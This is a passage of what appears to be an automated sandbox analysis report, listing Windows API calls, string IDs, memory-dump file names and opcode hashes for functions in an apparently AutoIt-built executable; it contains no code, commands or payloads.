                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F6D879
                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F6D897
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                              • String ID:
                                                              • API String ID: 1352324309-0
                                                              • Opcode ID: 000b725b7c175409c569065c6c728d0ca856a37b1063e7b62091811a3b19d65a
                                                              • Instruction ID: ee4db1db71145852d7e397c3582b0405d887e368fbcdb0666fc13e9aba254d71
                                                              • Opcode Fuzzy Hash: 000b725b7c175409c569065c6c728d0ca856a37b1063e7b62091811a3b19d65a
                                                              • Instruction Fuzzy Hash: A7115E75B05304DBE3208F60DC0CF92BBBCEB00B00F10856AA516D7090D7B0E959ABA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction ID: 4ed1597f305c6c7f715f6063259aa8ae893db013a3072f0a8fa35db4e874402f
                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction Fuzzy Hash: 0A01407244524ABBCF266F88DC01CED3F62BB18360F598415FE5858031D33AD9B1BB81
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00F9B2E4
                                                              • ScreenToClient.USER32(?,?), ref: 00F9B2FC
                                                              • ScreenToClient.USER32(?,?), ref: 00F9B320
                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F9B33B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                              • String ID:
                                                              • API String ID: 357397906-0
                                                              • Opcode ID: ac9f98703a1fef2c96c210fe4901839cf9f08c439577d791851729e97de4124e
                                                              • Instruction ID: 3f8fac74376c12dd2a680b38d93f912c402bded5b439ad47163270d70f2b8fe3
                                                              • Opcode Fuzzy Hash: ac9f98703a1fef2c96c210fe4901839cf9f08c439577d791851729e97de4124e
                                                              • Instruction Fuzzy Hash: D91143B9D0020DEFDB41CFA9D9849EEBBB9FB08310F108166E914E3220D735AA659F50
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F9B644
                                                              • _memset.LIBCMT ref: 00F9B653
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FD6F20,00FD6F64), ref: 00F9B682
                                                              • CloseHandle.KERNEL32 ref: 00F9B694
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseCreateHandleProcess
                                                              • String ID:
                                                              • API String ID: 3277943733-0
                                                              • Opcode ID: f2cbb61560d5a049b6da5b7f7096dabec7537c46cfe7431ff63f4126a07dd06c
                                                              • Instruction ID: 5e174fcb1cb66d8ca1cf404d981726a60c2a361b0336e9a1c370258ca3aec218
                                                              • Opcode Fuzzy Hash: f2cbb61560d5a049b6da5b7f7096dabec7537c46cfe7431ff63f4126a07dd06c
                                                              • Instruction Fuzzy Hash: 4AF012B26417087BF7102775BC46FBB7B9DEB09795F044022FA08E5292E7765C10A7A8
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00F76BE6
                                                                • Part of subcall function 00F776C4: _memset.LIBCMT ref: 00F776F9
                                                              • _memmove.LIBCMT ref: 00F76C09
                                                              • _memset.LIBCMT ref: 00F76C16
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00F76C26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                              • String ID:
                                                              • API String ID: 48991266-0
                                                              • Opcode ID: 24f1c7d4e5c8f005b398a8211bfd641825dad9beeeb4693e510baa6372eadede
                                                              • Instruction ID: b8cfc2f6d9ab70bb68bee6999617075d7b565fce750b6fd6eb69bc51abef72be
                                                              • Opcode Fuzzy Hash: 24f1c7d4e5c8f005b398a8211bfd641825dad9beeeb4693e510baa6372eadede
                                                              • Instruction Fuzzy Hash: 7DF0543A600104ABCF016F55EC85A4ABF29EF45361F04C062FE089E227C735E811EBB5
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00F12231
                                                              • SetTextColor.GDI32(?,000000FF), ref: 00F1223B
                                                              • SetBkMode.GDI32(?,00000001), ref: 00F12250
                                                              • GetStockObject.GDI32(00000005), ref: 00F12258
                                                              • GetWindowDC.USER32(?,00000000), ref: 00F4BE83
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F4BE90
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00F4BEA9
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00F4BEC2
                                                              • GetPixel.GDI32(00000000,?,?), ref: 00F4BEE2
                                                              • ReleaseDC.USER32(?,00000000), ref: 00F4BEED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: 720edb94fc1c8b39c19e5f5de09aa883ea828b099de9c3f8b8d31ca116540c74
                                                              • Instruction ID: c84a2b48bc3219d99505733aad25c65e4f79f2e1441984bb8f0c0529191298cb
                                                              • Opcode Fuzzy Hash: 720edb94fc1c8b39c19e5f5de09aa883ea828b099de9c3f8b8d31ca116540c74
                                                              • Instruction Fuzzy Hash: D4E0C031504148AADB215FA4EC4D7D83F11EB55336F148367FA69980E1877145D4EB51
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 00F6871B
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F682E6), ref: 00F68722
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F682E6), ref: 00F6872F
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F682E6), ref: 00F68736
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: e46190fb66ec949c74eaa52188fc12e9925aab2a98ac687c03ff50f26270a1ef
                                                              • Instruction ID: 62cc276a0acf68bc2ffb307315cc10fee64da4c7eda03736c863d4c65fdb2358
                                                              • Opcode Fuzzy Hash: e46190fb66ec949c74eaa52188fc12e9925aab2a98ac687c03ff50f26270a1ef
                                                              • Instruction Fuzzy Hash: 11E0CD36A113159BD7205FB05D0DF573BACEF547E1F14483DF245CA050DA74845AE750
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00F6B4BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container
                                                              • API String ID: 3565006973-3941886329
                                                              • Opcode ID: 99090e315368d87e5889803f9ac1272dd7b9afd6a6e483694de0b9f5ec1f5fab
                                                              • Instruction ID: c61033166950ae8f3464280020715ac15c51479b15a1281858dec74f71a2bb2b
                                                              • Opcode Fuzzy Hash: 99090e315368d87e5889803f9ac1272dd7b9afd6a6e483694de0b9f5ec1f5fab
                                                              • Instruction Fuzzy Hash: 60916A71600601AFDB14DF64C885BAAB7E9FF49710F24856EF94ACB3A1DB70E881DB50
                                                              APIs
                                                                • Part of subcall function 00F2FC86: _wcscpy.LIBCMT ref: 00F2FCA9
                                                                • Part of subcall function 00F19837: __itow.LIBCMT ref: 00F19862
                                                                • Part of subcall function 00F19837: __swprintf.LIBCMT ref: 00F198AC
                                                              • __wcsnicmp.LIBCMT ref: 00F7B02D
                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F7B0F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                              • String ID: LPT
                                                              • API String ID: 3222508074-1350329615
                                                              • Opcode ID: 1d91aec54d14c66053a0194ecf7216553e4ced04cf91102b97f173ef6b8989ad
                                                              • Instruction ID: e12140ea591006ff53370fc1950a5252dd54f7920df0a8170e66afa10151f803
                                                              • Opcode Fuzzy Hash: 1d91aec54d14c66053a0194ecf7216553e4ced04cf91102b97f173ef6b8989ad
                                                              • Instruction Fuzzy Hash: 3861B571E00215AFCB14DF54C851FEEB7B5EF09310F44806AF81AAB251DB74AE84EB91
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 00F22968
                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F22981
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              • Opcode ID: 06379406a18db992f1b5d6059b30716180ca5058cead197caf8b9169bb518d4b
                                                              • Instruction ID: 4251468bbc82fcbe111a8d3a08b0fdca393c4dfe89c717bf6d2782f05252a3c5
                                                              • Opcode Fuzzy Hash: 06379406a18db992f1b5d6059b30716180ca5058cead197caf8b9169bb518d4b
                                                              • Instruction Fuzzy Hash: CE516771408748ABD320EF50DC86BEFBBE8FB85350F81885DF2D8410A1DB709569EB66
                                                              APIs
                                                                • Part of subcall function 00F14F0B: __fread_nolock.LIBCMT ref: 00F14F29
                                                              • _wcscmp.LIBCMT ref: 00F79824
                                                              • _wcscmp.LIBCMT ref: 00F79837
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$__fread_nolock
                                                              • String ID: FILE
                                                              • API String ID: 4029003684-3121273764
                                                              • Opcode ID: 1cd836db230ff71e1f80fbf875b8edc117be66468a47629d2f5c037951694dff
                                                              • Instruction ID: 6df1ec6bbd8e75ae2cf69e6ed73eec35afcb254fd5c4dc022d355054c497d7d7
                                                              • Opcode Fuzzy Hash: 1cd836db230ff71e1f80fbf875b8edc117be66468a47629d2f5c037951694dff
                                                              • Instruction Fuzzy Hash: A841EB31A0420ABADF209FA4CC45FEFB7BDDF85710F40406AF904F7180D6B5A9459B62
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F8259E
                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F825D4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CrackInternet_memset
                                                              • String ID: |
                                                              • API String ID: 1413715105-2343686810
                                                              • Opcode ID: c68485da4cc82d0edb7de59b707b773aa1a5ddebca8b957e9b6b0a3caa0b8941
                                                              • Instruction ID: 4187b50403afea9dc04fc5c912c915f17fc646d8f9809fe50b6ce169f08e267a
                                                              • Opcode Fuzzy Hash: c68485da4cc82d0edb7de59b707b773aa1a5ddebca8b957e9b6b0a3caa0b8941
                                                              • Instruction Fuzzy Hash: 7D310A71800219EBCF41EFA1CC85EEEBFB8FF18350F100059F919A6162EB355996EB60
                                                              APIs
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00F97B61
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F97B76
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              • Opcode ID: 477a8f0e72780e34abc63105b8d56ef7029af8fe6701c49b15bbdc1d37319557
                                                              • Instruction ID: 9dffdcd21ded77043063b0672eb54cb540fdc09a474c0bf7fce022d4dde72740
                                                              • Opcode Fuzzy Hash: 477a8f0e72780e34abc63105b8d56ef7029af8fe6701c49b15bbdc1d37319557
                                                              • Instruction Fuzzy Hash: EF411675A0530A9FEF14DF64C881BEABBB5FB48300F10016AE904EB395E730A951EF90
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00F96B17
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F96B53
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              • Opcode ID: 78be564d47b92b19d4ca56f2928eb9d9ac47ee2194986213e38583797ac9c4f4
                                                              • Instruction ID: fa658546255ecb14f6b1e41e89228cae065cbbe6ad6af7dd39735228bf098fd6
                                                              • Opcode Fuzzy Hash: 78be564d47b92b19d4ca56f2928eb9d9ac47ee2194986213e38583797ac9c4f4
                                                              • Instruction Fuzzy Hash: 3B31A171500604AEEF109F64CC40BFB73B9FF88764F108619F9A5D7190DA35AC81EB60
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F72911
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F7294C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: b13c40a9cab3e4b6427d583c53bb7bd8b55db11df610b46bf750a8c1ff6e5e6b
                                                              • Instruction ID: 789bea4d4af515646f198084291d3e40c178052630483179a1a3b3247a51cd60
                                                              • Opcode Fuzzy Hash: b13c40a9cab3e4b6427d583c53bb7bd8b55db11df610b46bf750a8c1ff6e5e6b
                                                              • Instruction Fuzzy Hash: 6D31C331A003059BEB64CF58CC45BAEBBB9EF45360F18801BEA89A61A1D7709944FB52
                                                              APIs
                                                              • __snwprintf.LIBCMT ref: 00F83A66
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __snwprintf_memmove
                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                              • API String ID: 3506404897-2584243854
                                                              • Opcode ID: dbf2f42b83eb3c43aff426996224d0c038abe840cc13f372dac1639069f199b7
                                                              • Instruction ID: 5165cca796e62eb4e20fff680f8d95becb7823a794c83c1c7409e0a73e395273
                                                              • Opcode Fuzzy Hash: dbf2f42b83eb3c43aff426996224d0c038abe840cc13f372dac1639069f199b7
                                                              • Instruction Fuzzy Hash: 4E219335600219AFCF14FF64CC82EEE77B5AF44B40F500459F449A7192DB38EA46EBA1
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F96761
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F9676C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              • Opcode ID: 596fb72931b715f5c3c4a6041d9870a6f37fea8591ffd6c5526fb1a2e1e0f6a8
                                                              • Instruction ID: 877e33473c4b4b1ef8b051cb0f62fa77dfbdc339ace523555a3907a0f8575058
                                                              • Opcode Fuzzy Hash: 596fb72931b715f5c3c4a6041d9870a6f37fea8591ffd6c5526fb1a2e1e0f6a8
